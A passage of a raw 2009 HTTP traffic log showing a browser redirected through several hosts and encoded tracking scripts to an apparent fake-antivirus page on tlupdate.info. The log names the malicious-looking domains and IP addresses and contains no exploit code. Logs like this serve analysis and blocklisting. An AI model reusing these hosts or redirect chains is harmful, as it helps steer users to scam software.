Host: 208.94.233.40
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 14:01:34 GMT
Server: Apache
Set-Cookie: gkv-=1; expires=Thu, 13-Aug-2009 14:01:34 GMT
Set-Cookie: bkv-=1; expires=Tue, 11-Aug-2009 14:01:34 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 12 Aug 2009 14:01:34 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: /go.php?data=s5nKz1t63pi2a7chRizVwNj8R5tL66n%2FJSqSrEyE5Ds1XHySf%2FBEKbKrPXRQ0ZnLPxx4blfV+n8%2FSopcE6QUBHlnc892LbyqO0P40I0VVTOOcnyhWEOS+WYdqmv%2FDQATc998YKsxMpdTLX2I97MhU4EBnY8viphjQJgBhrkhZHbvAgilHGlaq00LydOf+AA6qtzMRttY7LY%2FnAC%2FrSDqTbsoA7CSDb4pPB6qZpCmg2GWLOunoAXICFv%2F2kiYKpLt+sQ%2Fwo+OzOgu2+V3yAPMYi9pUXSIzS1jQQs1mXbypFKuaaN8g9kEZ8VTZ9TZrM+Pkzpm1qL2vLJ5%2Fxdm6I+4yVO6jRKd+KStcllBj5ESBkTxBxhu29BKCh%2FoINGbx8+qmtyGewysJmVsbMlAkV8OgfL7q8P6Kv09icZITfllUxOa0uuYuLFDOOYpaLX+injcwg5+ve2+5bcein9VhhV7bThTdH8vBZMFAsXwLc2C+aOBerxBXw6nO9obFwhqkrlTgAdcQWiOuaP2KGEZQqhAwQLfrUeNsqyR4lMbfsLpfHxAPLUEbN1CmnSzF8POjbopvPMLNexE0z9DmJPtfs9dcnA7zjvapIMA38gA7Im5ky27yUlMW%2FBrJKEd4xViu45L6Y8ZuVN6l1zJ5JBPkuEneIc2Fct21KbWwwWZlMsFiJpwG4SQtEAlu6WVbFRhMAIKli7pcle%2F%2FzcNQKK9LwAamk86hkutnNlRlkXndh3eKlz3rW21mevjHZSwapnyjpvgei3T2aU5I9UdP5hpmeAIvK4%2FS5zxE5jhzqAa4RyMMHKZAJ2Sv1NXO2b1vTKeG+xrU%2FnInpvlFnx7TF0CLJl6QK+yBWqpoX6%2FBFQ6dBxLcu5fHMP7RBzV5Y7RIGjPkh5nmEt1qxBKBCrzscmLEwsp3tYY9VSSCqQz&an=1&f=1
Content-Length: 0
Connection: close
Content-Type: text/html

------------------------------------------------------------------
GET /go.php?data=s5nKz1t63pi2a7chRizVwNj8R5tL66n%2FJSqSrEyE5Ds1XHySf%2FBEKbKrPXRQ0ZnLPxx4blfV+n8%2FSopcE6QUBHlnc892LbyqO0P40I0VVTOOcnyhWEOS+WYdqmv%2FDQATc998YKsxMpdTLX2I97MhU4EBnY8viphjQJgBhrkhZHbvAgilHGlaq00LydOf+AA6qtzMRttY7LY%2FnAC%2FrSDqTbsoA7CSDb4pPB6qZpCmg2GWLOunoAXICFv%2F2kiYKpLt+sQ%2Fwo+OzOgu2+V3yAPMYi9pUXSIzS1jQQs1mXbypFKuaaN8g9kEZ8VTZ9TZrM+Pkzpm1qL2vLJ5%2Fxdm6I+4yVO6jRKd+KStcllBj5ESBkTxBxhu29BKCh%2FoINGbx8+qmtyGewysJmVsbMlAkV8OgfL7q8P6Kv09icZITfllUxOa0uuYuLFDOOYpaLX+injcwg5+ve2+5bcein9VhhV7bThTdH8vBZMFAsXwLc2C+aOBerxBXw6nO9obFwhqkrlTgAdcQWiOuaP2KGEZQqhAwQLfrUeNsqyR4lMbfsLpfHxAPLUEbN1CmnSzF8POjbopvPMLNexE0z9DmJPtfs9dcnA7zjvapIMA38gA7Im5ky27yUlMW%2FBrJKEd4xViu45L6Y8ZuVN6l1zJ5JBPkuEneIc2Fct21KbWwwWZlMsFiJpwG4SQtEAlu6WVbFRhMAIKli7pcle%2F%2FzcNQKK9LwAamk86hkutnNlRlkXndh3eKlz3rW21mevjHZSwapnyjpvgei3T2aU5I9UdP5hpmeAIvK4%2FS5zxE5jhzqAa4RyMMHKZAJ2Sv1NXO2b1vTKeG+xrU%2FnInpvlFnx7TF0CLJl6QK+yBWqpoX6%2FBFQ6dBxLcu5fHMP7RBzV5Y7RIGjPkh5nmEt1qxBKBCrzscmLEwsp3tYY9VSSCqQz&an=1&f=1 HTTP/1.1
Accept: */*
Referer: http://triwoperl.com/feed/search.php?q=hphosts&aff=19362&saff=200
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: 208.94.233.40
Connection: Keep-Alive
Cookie: gkv-=1

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 14:01:34 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 12 Aug 2009 14:01:34 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: http://207.226.184.198/kkk.php?data=YlZ6kCc81cb2YNNzFp9%2F2Hj6kNZ6IHz1kbk3aJX4EuAb%2FoFe6J%2BK%2Bf3Sc5wSHFlqIoCxV04QKRiESX%2Bv5I%2FICloMTZCLouIYp845ajiqwgY%2BTdfUg0ovCJ6xvUli2I2S2Z1mjPqDb8FoBVRDQv%2ByDTJ8EKVi6YJ12%2Ff7JzDQoy4xLwoLIcYqjgE7TLB5kb0qXJu1775b5m8Sy9rE%2BdrYnIG33hUVAR7Yvijw3IaYuNraezY%2FLCQDBat3nYbpQBGktgNHuGcMyRui8kz6hCjwmBquxNoMfIWcv7baa6cHJuH%2Boc2yLZ1UN1me0ZcsoGBERZGs%2BG0e9FSzRR%2FawEIZc%2BZgk%2FoHaXIRrZMDevyQLxI47RyMr8fQA7QCsPAkKtUEKHX3bMLCX8miQ87BJkDhRD8qTs2%2FOZ0mYZsYrlHkhEvWdAMJzTrQvAeDmzFP%2BSbI7pQicghdw8IlNUyltoHPcoy3F0HuWJcETrDTao0IGkS3qCE7lzI%2F2xysfRdwYbhjv6gZOYQdzmM%3D
Content-Length: 0
Connection: close
Content-Type: text/html

------------------------------------------------------------------
GET /kkk.php?data=YlZ6kCc81cb2YNNzFp9%2F2Hj6kNZ6IHz1kbk3aJX4EuAb%2FoFe6J%2BK%2Bf3Sc5wSHFlqIoCxV04QKRiESX%2Bv5I%2FICloMTZCLouIYp845ajiqwgY%2BTdfUg0ovCJ6xvUli2I2S2Z1mjPqDb8FoBVRDQv%2ByDTJ8EKVi6YJ12%2Ff7JzDQoy4xLwoLIcYqjgE7TLB5kb0qXJu1775b5m8Sy9rE%2BdrYnIG33hUVAR7Yvijw3IaYuNraezY%2FLCQDBat3nYbpQBGktgNHuGcMyRui8kz6hCjwmBquxNoMfIWcv7baa6cHJuH%2Boc2yLZ1UN1me0ZcsoGBERZGs%2BG0e9FSzRR%2FawEIZc%2BZgk%2FoHaXIRrZMDevyQLxI47RyMr8fQA7QCsPAkKtUEKHX3bMLCX8miQ87BJkDhRD8qTs2%2FOZ0mYZsYrlHkhEvWdAMJzTrQvAeDmzFP%2BSbI7pQicghdw8IlNUyltoHPcoy3F0HuWJcETrDTao0IGkS3qCE7lzI%2F2xysfRdwYbhjv6gZOYQdzmM%3D HTTP/1.1
Accept: */*
Referer: http://triwoperl.com/feed/search.php?q=hphosts&aff=19362&saff=200
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Cookie: g-=1
Connection: Keep-Alive
Host: 207.226.184.198

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 14:01:34 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a PHP/4.4.6 mod_perl/1.29 FrontPage/5.0.2.2510
X-Powered-By: PHP/4.4.6
Set-Cookie: g-=1; expires=Thu, 13 Aug 2009 14:01:34 GMT
Set-Cookie: b-=1; expires=Tue, 11 Aug 2009 14:01:34 GMT
Location: http://207.226.184.198/kkk.php?data=YlZ6kCc81cb2YNNzFp9%2F2Hj6kNZ6IHz1kbk3aJX4EuAb%2FoFe6J%2BK%2Bf3Sc5wSHFlqIoCxV04QKRiESX%2Bv5I%2FICloMTZCLouIYp845ajiqwgY%2BTdfUg0ovCJ6xvUli2I2S2Z1mjPqDb8FoBVRDQv%2ByDTJ8EKVi6YJ12%2Ff7JzDQoy4xLwoLIcYqjgE7TLB5kb0qXJu1775b5m8Sy9rE%2BdrYnIG33hUVAR7Yvijw3IaYuNraezY%2FLCQDBat3nYbpQBGktgNHuGcMyRui8kz6hCjwmBquxNoMfIWcv7baa6cHJuH%2Boc2yLZ1UN1me0ZcsoGBERZGs%2BG0e9FSzRR%2FawEIZc%2BZgk%2FoHaXIRrZMDevyQLxI47RyMr8fQA7QCsPAkKtUEKHX3bMLCX8miQ87BJkDhRD8qTs2%2FOZ0mYZsYrlHkhEvWdAMJzTrQvAeDmzFP%2BSbI7pQicghdw8IlNUyltoHPcoy3F0HuWJcETrDTao0IGkS3qCE7lzI%2F2xysfRdwYbhjv6gZOYQdzmM%3D&data2=&an=1&f=1&ch=0
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

------------------------------------------------------------------
GET /kkk.php?data=YlZ6kCc81cb2YNNzFp9%2F2Hj6kNZ6IHz1kbk3aJX4EuAb%2FoFe6J%2BK%2Bf3Sc5wSHFlqIoCxV04QKRiESX%2Bv5I%2FICloMTZCLouIYp845ajiqwgY%2BTdfUg0ovCJ6xvUli2I2S2Z1mjPqDb8FoBVRDQv%2ByDTJ8EKVi6YJ12%2Ff7JzDQoy4xLwoLIcYqjgE7TLB5kb0qXJu1775b5m8Sy9rE%2BdrYnIG33hUVAR7Yvijw3IaYuNraezY%2FLCQDBat3nYbpQBGktgNHuGcMyRui8kz6hCjwmBquxNoMfIWcv7baa6cHJuH%2Boc2yLZ1UN1me0ZcsoGBERZGs%2BG0e9FSzRR%2FawEIZc%2BZgk%2FoHaXIRrZMDevyQLxI47RyMr8fQA7QCsPAkKtUEKHX3bMLCX8miQ87BJkDhRD8qTs2%2FOZ0mYZsYrlHkhEvWdAMJzTrQvAeDmzFP%2BSbI7pQicghdw8IlNUyltoHPcoy3F0HuWJcETrDTao0IGkS3qCE7lzI%2F2xysfRdwYbhjv6gZOYQdzmM%3D&data2=&an=1&f=1&ch=0 HTTP/1.1
Accept: */*
Referer: http://triwoperl.com/feed/search.php?q=hphosts&aff=19362&saff=200
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Cookie: g-=1
Connection: Keep-Alive
Host: 207.226.184.198

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 14:01:35 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a PHP/4.4.6 mod_perl/1.29 FrontPage/5.0.2.2510
X-Powered-By: PHP/4.4.6
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 12 Aug 2009 14:01:35 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: http://amgokz.net/in.cgi?16¶meter=hphosts&ur=1&HTTP_REFERER=19362
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

------------------------------------------------------------------
GET /in.cgi?16¶meter=hphosts&ur=1&HTTP_REFERER=19362 HTTP/1.1
Accept: */*
Referer: http://triwoperl.com/feed/search.php?q=hphosts&aff=19362&saff=200
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Connection: Keep-Alive
Host: amgokz.net
Cookie: SL_16_0000=_2_; SL_20_0000=_17_

HTTP/1.1 200 OK
Date: Wed, 12 Aug 2009 12:02:20 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 923
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

------------------------------------------------------------------
GET /in.cgi?16&ab_iframe=0&ab_badtraffic=0&antibot_hash=776170951&ur=1&HTTP_REFERER=19362¶meter=hphosts&ur=1&HTTP_REFERER=19362 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Connection: Keep-Alive
Host: amgokz.net
Cookie: SL_16_0000=_2_; SL_20_0000=_17_

HTTP/1.1 200 OK
Date: Wed, 12 Aug 2009 12:02:20 GMT
Server: Apache/2
Set-Cookie: SL_16_0000=_2_; domain=amgokz.net; path=/; expires=Thu, 13-Aug-2009 12:02:20 GMT
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 315
Keep-Alive: timeout=1, max=99
Connection: Keep-Alive
Content-Type: text/html

------------------------------------------------------------------
GET /Upload/index.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://amgokz.net/in.cgi?16&ab_iframe=0&ab_badtraffic=0&antibot_hash=776170951&ur=1&HTTP_REFERER=19362¶meter=hphosts&ur=1&HTTP_REFERER=19362
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: morde.info
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 21:44:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.8
Set-Cookie: PREFIXvisited=27; expires=Mon, 17-Aug-2009 01:44:16 GMT
Location:
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251
Content-Language: ru

------------------------------------------------------------------
GET /in.cgi?20¶meter=bank+online4&ur=1&HTTP_REFERER= HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://amgokz.net/in.cgi?16&ab_iframe=0&ab_badtraffic=0&antibot_hash=776170951&ur=1&HTTP_REFERER=19362¶meter=hphosts&ur=1&HTTP_REFERER=19362
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: amgokz.net
Connection: Keep-Alive
Cookie: SL_16_0000=_2_; SL_20_0000=_17_

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 12:02:21 GMT
Server: Apache/2
Set-Cookie: SL_20_0000=_17_; domain=amgokz.net; path=/; expires=Thu, 13-Aug-2009 12:02:21 GMT
Location: http://tlupdate.info/hitin.php?land=20&affid=02909
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 172
Keep-Alive: timeout=1, max=98
Connection: Keep-Alive
Content-Type: text/html

------------------------------------------------------------------
GET /hitin.php?land=20&affid=02909 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://amgokz.net/in.cgi?16&ab_iframe=0&ab_badtraffic=0&antibot_hash=776170951&ur=1&HTTP_REFERER=19362¶meter=hphosts&ur=1&HTTP_REFERER=19362
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 15:01:11 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
X-Powered-By: PHP/5.2.10
location: index.php?affid=02909
Content-Length: 0
Keep-Alive: timeout=20, max=120
Connection: Keep-Alive
Content-Type: text/html

------------------------------------------------------------------
GET /index.php?affid=02909 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://amgokz.net/in.cgi?16&ab_iframe=0&ab_badtraffic=0&antibot_hash=776170951&ur=1&HTTP_REFERER=19362¶meter=hphosts&ur=1&HTTP_REFERER=19362
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Wed, 12 Aug 2009 15:01:11 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
X-Powered-By: PHP/5.2.10
Keep-Alive: timeout=20, max=119
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

------------------------------------------------------------------
GET /Upload/ HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://amgokz.net/in.cgi?16&ab_iframe=0&ab_badtraffic=0&antibot_hash=776170951&ur=1&HTTP_REFERER=19362¶meter=hphosts&ur=1&HTTP_REFERER=19362
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: morde.info
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 21:44:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.8
Set-Cookie: PREFIXvisited=30; expires=Mon, 17-Aug-2009 01:44:17 GMT
Location:
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=1, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251
Content-Language: ru

------------------------------------------------------------------
GET /js/jquery.js HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "8996-d9c2-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:12 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=118
ETag: "8996-d9c2-45c848abe2c00"

------------------------------------------------------------------
GET /js/jquery-init.js HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "8995-292-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:12 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=120
ETag: "8995-292-45c848abe2c00"

------------------------------------------------------------------
GET /Upload/ HTTP/1.1
Accept: */*
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Connection: Keep-Alive
Host: morde.info

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 21:44:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.8
Set-Cookie: PREFIXvisited=2; expires=Mon, 17-Aug-2009 01:44:18 GMT
Location:
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251
Content-Language: ru

------------------------------------------------------------------
GET /js/flist.js HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Sat, 13 Jun 2009 10:00:00 GMT
If-None-Match: "8994-8017-46c37e3576800"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:13 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=117
ETag: "8994-8017-46c37e3576800"

------------------------------------------------------------------
GET /images/alert.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8978-3e0a-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:13 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=119
ETag: "8978-3e0a-45c84872aa500"

------------------------------------------------------------------
GET /images/page_progressbar.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "8988-243-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:14 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=116
ETag: "8988-243-45c848abe2c00"

------------------------------------------------------------------
GET /images/i5000000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8984-421-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:14 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=118
ETag: "8984-421-45c84872aa500"

------------------------------------------------------------------
GET /images/i7000000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "8986-41e-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:15 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=115
ETag: "8986-41e-45c848abe2c00"

------------------------------------------------------------------
GET /images/i1000000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8980-42f-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:15 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=117
ETag: "8980-42f-45c84872aa500"

------------------------------------------------------------------
GET /images/box_top_.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8979-5c9-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:15 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=114
ETag: "8979-5c9-45c84872aa500"

------------------------------------------------------------------
GET /images/i3000000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8982-418-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:15 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=116
ETag: "8982-418-45c84872aa500"

------------------------------------------------------------------
GET /images/i4000000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8983-41f-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:16 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=113
ETag: "8983-41f-45c84872aa500"

------------------------------------------------------------------
GET /images/inf20000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "8987-1a1-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:16 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=115
ETag: "8987-1a1-45c848abe2c00"

------------------------------------------------------------------
GET /images/hdd.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "897e-77c-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

